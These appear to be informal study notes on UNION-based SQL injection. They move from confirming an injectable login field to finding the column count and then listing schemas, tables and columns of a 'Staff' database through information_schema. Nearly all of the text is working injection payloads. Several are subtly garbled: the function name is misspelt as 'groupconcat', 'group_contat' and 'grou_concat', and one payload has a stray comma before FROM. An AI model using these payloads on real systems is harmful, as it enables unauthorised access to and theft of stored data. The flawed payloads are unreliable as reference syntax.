if you find a SQL vuln in an application, try UNION injection

if the basic "admin'-- -" is possible, that means the query will look like

SELECT * FROM USERS WHERE FIRST_NAME = 'userinput'-- -'

so everything after WHERE is possible

In this example below, we've got ID, Name, Position, Phone No, and Email data

Try doing admin' UNION SELECT NULL,NULL,.... -- - to see any weird behaviors. (data breaking, byte changes) with burp

or do admin' ORDER BY 1, ORDER BY 2.....

If it breaks that means it can only handle the number before the error.

Now, we can extract useful data from the database!

try database()

Information_schema.tables

extract data from columns, tables

1. UNION SELECT SCHEMANAME,2,3,4,5,6 FROM information_schema.schemata -- -

if you can't extract multiple data at once, try

'UNION SELECT groupconcat(SCHEMANAME),2,3,4,5,6, FROM information_schema.schemata-- -

What tables are in user database?

group_contat(TABLE_NAME) FROM information_schema.tables where table_schema = "Staff"-- -

Once we know table names, try to extract data from columns

grou_concat(COLUMN_NAME),2,3,4,5,6, FROM information_schema.columns where table_schema = "Staff"-- -

displaying table and columns names

grou_concat(TABLE_NAME,":",COLUMN_NAME),2,3,4,5,6, FROM information_schema.columns where table_schema = "Staff" and table_name ="Users"-- -